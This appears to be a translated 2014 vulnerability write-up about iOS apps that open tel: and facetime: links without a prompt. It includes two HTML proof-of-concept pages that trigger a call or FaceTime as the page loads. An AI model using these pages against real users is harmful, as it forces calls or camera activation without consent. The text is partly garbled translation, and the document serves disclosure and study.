Ano_Tom · 2014/08/27 16:41
0 x00 background
A foreign security researcher discovered the flaw, which in some apps on iOS devices (successfully tested with Google+, Facebook Messenger, and Gmail) automatically makes a phone call or opens FaceTime when a user clicks on a link, turning on the front-facing camera. Without warning. The bug was caused by developers not reading the official developer documentation for Phone Links and FaceTime Links stating that “iOS does not display notification Windows when users open this type of link in the native app”.
0x01 Defect Description
According to apple’s official documentation, there are roughly the following types of URL schemes:
1) Mail Links
When this type of link is clicked, the mail application is automatically invoked, and the Mailto URL must specify a mailing address.
The string format in the web page link is as follows
<a href="mailto:[email protected]">John Frank</a>
Copy the code
The format of the URL string on the local application is
mailto:[email protected]
Copy the code
You can also add topics to the string, for example
mailto:[email protected][email protected]&subject=Greetings%20from%20Cupertino! &body=Wish%20you%20were%20here!Copy the code
See the RFC documentation for the mailto format
www.ietf.org/rfc/rfc2368…
2) Phone Links
The TEL URL is used to enable the application for making calls on aN iOS device and dial the specified number. When a user clicks a link of this type on a web page, the iOS device pops up an alert asking the user whether to dial the number, and if the user agrees, the call begins. But when a user opens this type of link in a native app, iOS doesn’t show an alert window, but instead calls the specified number. Of course native applications can be configured to display reminders or not.
For example, embed an A tag in the web page, the content is
<a href="tel:10086">fuck it</a>
Copy the code
Then visit this page and click on the Fuck it link to automatically pop up a reminder to make a phone call. As shown in figure 1
The official documentation also gives the form of the URL in the local app. The url string in the local app is TEL :1-408-555-5555
Enter tel://10086 on the SMS page, and then it will prompt you to make a call, as shown in Figure 2
At the same time to prevent malicious requests, links contain * # characters, the system will not call the number. In addition, the detection of phone numbers on iOS is enabled by default. If you want to prevent the numbers contained on the web page from being identified as mobile numbers, you need to add the following labels to the web page
<meta name = "format-detection" content = "telephone=no">
Copy the code
For the specific URL scheme, please refer to the following RFC documents.
www.ietf.org/rfc/rfc2396… www.ietf.org/rfc/rfc2806…
3) FaceTime Links (FaceTime enabled, front-facing camera enabled)
A FaceTime URL is used to call the FaceTime application to a specified user, either a phone number or an email address bound to it. When a user clicks a FaceTime URL on a web page, the system prompts whether to dial. But when this type of URL is clicked in the native app, iOS directly opens the FaceTime app to make a call without prompting. Local applications can be configured to display reminders. Links in web pages are formatted as
<a href="facetime:14085551234">Connect using FaceTime</a>
<a href="facetime:[email protected]">Connect using FaceTime</a>
Copy the code
The URL string in the local application is
facetime:// 14085551234
facetime:[email protected]
Copy the code
Of course, to prevent malicious requests, the system will not call the number if the link contains the * # character. And before iOS7, when you use this protocol to make phone calls, you use the default regular call app instead of the FaceTime app
4) SMS Links
The SMS solution is used to open the SMS application. The URL is in the following format: SMS: specifies the target user’s number, which can contain arrays of 0 to 9 and +-. Three characters, and the URL string cannot contain any other text information
Links in web pages are formatted as
<a href="sms:">Launch Messages App</a>
<a href="sms:1-408-555-1212">New SMS Message</a>
Copy the code
The URL string in the local application is
sms:1-408-555-1212
Copy the code
5) Other types of Links
Others like Map Links (open Map), iTunes Links (open iTunes), YouTube Links (open YouTube), etc., are not introduced one by one. Click the specified link to open the corresponding Map, iTunes apps, etc., and check the official Development documents of Apple in detail.
As can be seen from the above introduction, Phone Links and FaceTime Links can be used. If the link is in a local application, clicking on it will call the relevant application directly without any warning.
If you type tel:// XXXX or facetime:// XXXX in the application, the relevant dialing application will be directly called. Similarly, we can input web links in the application, and then embed such a tag link in the web content, and then use JS to automatically click the A tag link when loading the web page.
So the specific test code is as follows, save it as an HTML file.
<a id="target" href="facetime:[email protected]">click me</a>
<script>
var target = document.getElementById("target");
var fakeEvent = document.createEvent("MouseEvents");
fakeEvent.initEvent("click", true, false);
target.dispatchEvent(fakeEvent);
</script>
Copy the code
Or the following
<html> <head> <title>v</title> </head> <body> <a id="dial" href="tel:10086">fuck it</a> </body> <script type="text/javascript"> <! -- window.onload = function() { window.location.href = document.getElementById("dial").href; }; //--> </script> </html>Copy the code
Tel: XXXXX indicates the number you want to call. If you click the link, you will be automatically dialed.
Facetiem: XXXXX indicates the faceTime account dialed. After clicking this link, the camera will automatically open without any reminder.
Note: The second code failed in some applications and the first code would have succeeded in the application.
0x02 Case Test
We have tested several common chat applications in China, and found that the defect exists in most of them. We have reported it to the manufacturer, and it may take some time to repair it. Here is an example of e-trust submitted on Cloud Cloud (new version will be released officially). The test version is iOS 6.1.4 and e-Trust V2.9.0.1680
Post the URL in moments, as shown in Figure 3
After clicking, a friend will automatically make a call or start FaceTime, as shown in Figure 2 and 3
0x03 How Can I Repair it
The notification Settings can be configured by opening the corresponding URL in the native app, as described in apple’s official development documentation. So it’s possible that developers didn’t fully understand apple’s URL specification and inadvertently caused the problem. The exact fix is not clear because of the lack of exposure to iOS development. 🙂
References:
Algorithm. The dk/posts/RTFM -… Developer.apple.com/library/ios… Developer.apple.com/library/ios…